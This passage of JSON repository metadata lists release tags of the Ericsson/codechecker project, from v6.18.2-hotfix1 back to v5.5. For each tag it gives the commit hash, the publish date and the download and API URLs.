","sha":"359e88b9339946cba84c00ad32511be8b7fad65d","kind":"commit","published_at":"2022-02-03T09:31:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1/manifests"},{"name":"v6.18.2","sha":"992d274c78b9a0436328c30a40d3b1de899902e2","kind":"commit","published_at":"2022-01-14T14:04:31.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2/manifests"},{"name":"v6.18.1","sha":"fd5f7e04219f947cfda68e9e11f4d3b07f0564a5","kind":"commit","published_at":"2021-12-10T07:28:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1/manifests"},{"name":"v6.18.0-hotfix1","sha":"a46603ab87348ff5e9bf5016fd906e9ef6781eb4","kind":"commit","published_at":"2021-11-18T17:46:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1/manifests"},{"name":"v6.18.0","sha":"153b0e09efc715fd16eee815eecf454f9f79f7f1","kind":"commit","published_at":"2021-11-12T12:51:42.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0/manifests"},{"name":"v6.17.0-hotfix1","sha":"315d4494603b02252966770452e676fd63a67021","kind":"commit","published_at":"2021-10-14T12:22:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1/manifests"},{"name":"v6.17.0","sha":"d0e2d7ba5f62d722e907d1ce8af6dbb24ee34e5d","kind":"commit","published_at":"2021-09-10T14:05:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0/manifests"},{"name":"v6.16.0-hotfix1","sha":"dcb4c5c74697711e0b65bb88b1796aec34846649","kind":"commit","published_at":"2021-06-23T13:36:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1/manifests"},{"name":"v6.16.0","sha":"8880695af939838b2e1e16b018c51ed66c6a5366","kind":"commit","published_at":"2021-06-01T12:07:59.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0/manifests"},{"name":"v6.15.2","sha":"63740679d61ff715175b9f31858d2fe9767efa41","kind":"commit","published_at":"2021-04-06T13:47:08.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2/manifests"},{"name":"v6.15.1-hotfix1","sha":"55c53a71295e07ea9ae3370130e6495649e8760a","kind":"commit","published_at":"2021-03-10T10:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1/manifests"},{"name":"v6.15.1","sha":"692e51ba4be08e97c4b07cc344edca082dc50f63","kind":"commit","published_at":"2021-02-03T12:52:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1/manifests"},{"name":"v6.15.0-hotfix1","sha":"267e9cb77e55f77a457b3b1f2f3660f35564939e","kind":"commit","published_at":"2021-01-08T11:03:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1/manifests"},{"name":"v6.15.0","sha":"131861b7e94298f58cad883a533814573b89a0f3","kind":"commit","published_at":"2020-11-12T23:55:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0/manifests"},{"name":"v6.14.0","sha":"644f900e80e2053cdb7d69eee3dfa34e622c185c","kind":"commit","published_at":"2020-09-11T13:12:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.14.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0/manifests"},{"name":"v6.13.0","sha":"17678b103375a9dbff6e69328d0996d54de78ef3","kind":"commit","published_at":"2020-07-10T13:24:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.13.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0/manifests"},{"name":"v6.12.1","sha":"be4c6ac31f125be8432589ea9e9e5b1bbd838d22","kind":"commit","published_at":"2020-06-12T11:46:39.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1/manifests"},{"name":"v6.12.0","sha":"ecccb6308db0a16d80bb6273280d482576d28d8b","kind":"commit","published_at":"2020-05-14T17:59:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0/manifests"},{"name":"v6.11.1","sha":"9bb0047368707a18efaca3a207dc8227c8e19b9e","kind":"commit","published_at":"2020-02-12T23:12:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1/manifests"},{"name":"v6.11.0","sha":"65a042f1ad0dec5581d54cb13396d201a573c0b2","kind":"commit","published_at":"2019-12-12T16:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0/manifests"},{"name":"v6.10.1","sha":"d3928e30d25bd10da977d2d1119f300a30179cc0","kind":"commit","published_at":"2019-10-09T14:33:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1/manifests"},{"name":"v6.10.0","sha":"28cb13900c6e2ada55f469d267e05cab9844a97a","kind":"commit","published_at":"2019-07-11T18:00:44.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0/manifests"},{"name":"v6.9.1","sha":"197579e082c64e42043683b4e14ae2228a5c7d89","kind":"commit","published_at":"2019-04-11T13:22:48.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1/manifests"},{"name":"v6.9.0","sha":"03351d259b47a57d0c0daebf2a2b00149ea37298","kind":"commit","published_at":"2019-02-08T14:26:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0/manifests"},{"name":"v6.8.1","sha":"e8b4c6172b45428f997c0e7f37891e11ae312180","kind":"commit","published_at":"2018-11-08T10:10:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1/manifests"},{"name":"v6.8.0","sha":"2bd99a0b24b4b62fb85992f94ab682c4a9ddc362","kind":"commit","published_at":"2018-09-11T11:33:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0/manifests"},{"name":"v6.7.1","sha":"968bd5ae5f82fe2d5d329005a2e7748c1200d8fc","kind":"commit","published_at":"2018-06-08T09:08:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1/manifests"},{"name":"v6.7.0","sha":"9c4f1c514517af66c92e8b73332a79f2adf69e73","kind":"commit","published_at":"2018-05-16T11:22:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0/manifests"},{"name":"v6.6.0","sha":"d507de883bd29bdc8221e8ecb74c9d1117ad5867","kind":"commit","published_at":"2018-03-22T14:30:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0/manifests"},{"name":"v6.5.1","sha":"fd2df3820f3985e4b2e2b576d0cc9aa9c2474348","kind":"commit","published_at":"2018-02-22T16:01:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1/manifests"},{"name":"v6.5","sha":"7370d62dccac3c5ce2771764fa92b8e3bc22bbac","kind":"commit","published_at":"2018-02-07T12:01:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5/manifests"},{"name":"v6.4","sha":"32ea3cf57eb71255307c065ff8bac6513e0064b9","kind":"commit","published_at":"2018-01-11T14:04:15.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4/manifests"},{"name":"v6.3","sha":"44c2a7740fa27b9459c40daea2b7836b1c8ca250","kind":"commit","published_at":"2017-12-11T19:02:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3/manifests"},{"name":"v6.2.1","sha":"174807916c5df8cd80bb08d5f11ac6a49f9e91bf","kind":"commit","published_at":"2017-11-27T16:06:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1/manifests"},{"name":"v6.2","sha":"b5ef68f0049ce63a767d82ca602b470ad3f5e758","kind":"commit","published_at":"2017-11-15T16:54:58.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2/manifests"},{"name":"v6.1.1","sha":"64e128e075defb1e05002ecef481ca120d79fb84","kind":"commit","published_at":"2017-10-27T14:25:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1/manifests"},{"name":"v6.1","sha":"ab67d2626297da41ec42afa2cbb404538069db1f","kind":"commit","published_at":"2017-10-13T16:22:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1/manifests"},{"name":"v6.0.1","sha":"f7506fde033e6f57af6612847b447af69077ac8c","kind":"commit","published_at":"2017-10-02T09:28:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1/manifests"},{"name":"v6.0","sha":"666452b9ab4fc97438ac2c45166def3bd3269971","kind":"commit","published_at":"2017-09-18T22:19:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0/manifests"},{"name":"v5.10","sha":"927979c4eee9f53f5fec79fba3e1be7c606c599c","kind":"commit","published_at":"2017-08-09T18:31:55.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.10","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10/manifests"},{"name":"v5.9","sha":"ebb1d0330efa1da5712a01c92e0c004aba46bd05","kind":"commit","published_at":"2017-07-14T14:09:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.9","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9/manifests"},{"name":"v5.8","sha":"e8f7d02769a613286c1749d70495ba6a41f7427c","kind":"commit","published_at":"2017-07-07T12:32:03.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.8","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8/manifests"},{"name":"v5.7.1","sha":"2eca2df6a9d0f5482c1783f063568de5c1ddbe5d","kind":"commit","published_at":"2017-02-09T17:03:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1/manifests"},{"name":"v5.7","sha":"1ce7ccbefb1212726331a1fcde4dd37a17cdaccf","kind":"commit","published_at":"2017-01-11T17:17:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7/manifests"},{"name":"v5.6","sha":"e1b0157ad9f61a946fa0343708be7336cf1a6314","kind":"commit","published_at":"2016-11-15T09:20:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6/manifests"},{"name":"v5.5","sha":"c7bafa16fdaf48ed7a890aea002ae0275e32d963","kind":"